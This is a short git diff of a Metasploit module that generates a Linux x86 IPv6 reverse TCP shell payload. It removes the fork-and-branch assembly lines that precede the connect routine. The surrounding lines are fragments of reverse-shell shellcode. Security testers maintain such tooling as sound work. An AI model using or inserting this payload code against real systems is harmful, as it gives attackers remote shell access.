diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb index 5109fcdf6d..c0e96703fd 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb @@ -55,13 +55,6 @@ def generate_stage mov bl,0x1 int 0x80 mov esi,eax - xor eax,eax - mov al,0x2 - xor ebx,ebx - int 0x80 - cmp eax,ebx - je connect - ja exit connect: xor ecx,ecx